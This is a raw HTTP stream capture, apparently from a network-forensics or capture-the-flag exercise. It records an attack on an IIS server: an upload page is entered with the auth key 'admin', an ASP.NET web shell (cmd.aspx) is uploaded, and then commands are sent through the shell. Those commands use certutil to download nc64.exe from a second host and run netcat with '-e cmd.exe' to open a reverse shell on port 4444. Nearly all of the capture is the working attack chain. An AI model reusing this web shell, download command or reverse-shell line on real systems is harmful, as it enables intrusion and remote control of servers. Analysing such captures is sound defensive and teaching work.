TCP Stream 0
GET / HTTP/1.1
Host: 22.22.22.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
If-Modified-Since: Sun, 01 Nov 2020 15:24:57 GMT
If-None-Match: "8a9fd02763b0d61:0"
HTTP/1.1 304 Not Modified
Last-Modified: Sun, 01 Nov 2020 15:24:57 GMT
Accept-Ranges: bytes
ETag: "8a9fd02763b0d61:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 Nov 2020 17:20:11 GMT
GET /welcome.png HTTP/1.1
Host: 22.22.22.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://22.22.22.5/
If-Modified-Since: Sun, 01 Nov 2020 15:24:57 GMT
If-None-Match: "ecbe62763b0d61:0"
HTTP/1.1 304 Not Modified
Last-Modified: Sun, 01 Nov 2020 15:24:57 GMT
Accept-Ranges: bytes
ETag: "ecbe62763b0d61:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 Nov 2020 17:20:11 GMT
GET /upload.aspx HTTP/1.1
Host: 22.22.22.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 Nov 2020 17:20:26 GMT
Content-Length: 591
<html>
<head>
<title>filesystembrowser</title>
<style type="text/css"><!--
body,table,p,pre,form input,form select {
font-family: "Lucida Console", monospace;
font-size: 88%;
}
-->
</style></head>
<body>
<form enctype="multipart/form-data" action="?operation=upload" method="post"><br>Auth Key: <input type="text" name="authKey"><br><br>Please specify a file: <input type="file" name="file"></br><div><input type="submit" value="Send"></div></form></body>
</html>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
POST /upload.aspx?operation=upload HTTP/1.1
Host: 22.22.22.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------240279915540934710361858528148
Content-Length: 1899
Origin: http://22.22.22.5
Connection: keep-alive
Referer: http://22.22.22.5/upload.aspx
Upgrade-Insecure-Requests: 1
-----------------------------240279915540934710361858528148
Content-Disposition: form-data; name="authKey"
admin
-----------------------------240279915540934710361858528148
Content-Disposition: form-data; name="file"; filename="cmd.aspx"
Content-Type: application/octet-stream
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<script runat="server">
</script>
<html>
<body>
<form runat="server">
<p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>
<asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
<p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>
<asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>
<p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>
<p><asp:Label id="result" runat="server"></asp:Label>
</form>
</body>
</html>
-----------------------------240279915540934710361858528148--
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 Nov 2020 17:20:35 GMT
Content-Length: 360
<html>
<head>
<title>filesystembrowser</title>
<style type="text/css"><!--
body,table,p,pre,form input,form select {
font-family: "Lucida Console", monospace;
font-size: 88%;
}
-->
</style></head>
<body>
File uploaded</body>
</html>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /cmd.aspx HTTP/1.1
Host: 22.22.22.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 Nov 2020 17:20:42 GMT
Content-Length: 917
<html>
<body>
<form name="ctl00" method="post" action="cmd.aspx" id="ctl00">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTk5MjkzMTA5MWRkwVojPOuktGOWqG0pwsyOK2JElGI=" />
</div>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBAKI2YrhDgL71d7YCAKRuYD5CALT/r7ABAPkkpTQLNd7HWr8RlrYcnI0Hcmr" />
</div>
<p><span id="L_p" style="display:inline-block;width:80px;">Program</span>
<input name="xpath" type="text" value="c:\windows\system32\cmd.exe" id="xpath" style="width:300px;" />
<p><span id="L_a" style="display:inline-block;width:80px;">Arguments</span>
<input name="xcmd" type="text" value="/c net user" id="xcmd" style="width:300px;" />
<p><input type="submit" name="Button" value="Run" id="Button" style="width:100px;" />
<p><span id="result"></span>
</form>
</body>
</html>POST /cmd.aspx HTTP/1.1
Host: 22.22.22.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 313
Origin: http://22.22.22.5
Connection: keep-alive
Referer: http://22.22.22.5/cmd.aspx
Upgrade-Insecure-Requests: 1
__VIEWSTATE=%2FwEPDwUKLTk5MjkzMTA5MWRkwVojPOuktGOWqG0pwsyOK2JElGI%3D&__EVENTVALIDATION=%2FwEWBAKI2YrhDgL71d7YCAKRuYD5CALT%2Fr7ABAPkkpTQLNd7HWr8RlrYcnI0Hcmr&xpath=c%3A%5Cwindows%5Csystem32%5Ccmd.exe&xcmd=%2Fc+certutil+-urlcache+-split+-f+http%3A%2F%2F22.22.22.7%2Fnc64.exe+c%3A%5Cusers%5Cpublic%5Cnc.exe&Button=RunHTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 Nov 2020 17:21:42 GMT
Content-Length: 1270
<html>
<body>
<form name="ctl00" method="post" action="cmd.aspx" id="ctl00">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTk5MjkzMTA5MQ9kFgICAQ9kFgICCw8PFgIeBFRleHQFaw0KPHByZT4qKioqICBPbmxpbmUgICoqKioNCiAgMDAwMCAgLi4uDQogIGIwZDgNCkNlcnRVdGlsOiAtVVJMQ2FjaGUgY29tbWFuZCBjb21wbGV0ZWQgc3VjY2Vzc2Z1bGx5Lg0KPC9wcmU+ZGRk8LGROcfmxzGiIEGxxlI6IHeRdyA=" />
</div>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBAKQ5ISyAgL71d7YCAKRuYD5CALT/r7ABJjJbr/u6tvYS9iG9x2jvQ+MU8CJ" />
</div>
<p><span id="L_p" style="display:inline-block;width:80px;">Program</span>
<input name="xpath" type="text" value="c:\windows\system32\cmd.exe" id="xpath" style="width:300px;" />
<p><span id="L_a" style="display:inline-block;width:80px;">Arguments</span>
<input name="xcmd" type="text" value="/c certutil -urlcache -split -f http://22.22.22.7/nc64.exe c:\users\public\nc.exe" id="xcmd" style="width:300px;" />
<p><input type="submit" name="Button" value="Run" id="Button" style="width:100px;" />
<p><span id="result">
<pre>**** Online ****
0000 ...
b0d8
CertUtil: -URLCache command completed successfully.
</pre></span>
</form>
</body>
</html>POST /cmd.aspx HTTP/1.1
Host: 22.22.22.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 458
Origin: http://22.22.22.5
Connection: keep-alive
Referer: http://22.22.22.5/cmd.aspx
Upgrade-Insecure-Requests: 1
__VIEWSTATE=%2FwEPDwUKLTk5MjkzMTA5MQ9kFgICAQ9kFgICCw8PFgIeBFRleHQFaw0KPHByZT4qKioqICBPbmxpbmUgICoqKioNCiAgMDAwMCAgLi4uDQogIGIwZDgNCkNlcnRVdGlsOiAtVVJMQ2FjaGUgY29tbWFuZCBjb21wbGV0ZWQgc3VjY2Vzc2Z1bGx5Lg0KPC9wcmU%2BZGRk8LGROcfmxzGiIEGxxlI6IHeRdyA%3D&__EVENTVALIDATION=%2FwEWBAKQ5ISyAgL71d7YCAKRuYD5CALT%2Fr7ABJjJbr%2Fu6tvYS9iG9x2jvQ%2BMU8CJ&xpath=c%3A%5Cwindows%5Csystem32%5Ccmd.exe&xcmd=%2Fc+c%3A%5Cusers%5Cpublic%5Cnc.exe+22.22.22.7+4444+-e+cmd.exe&Button=Run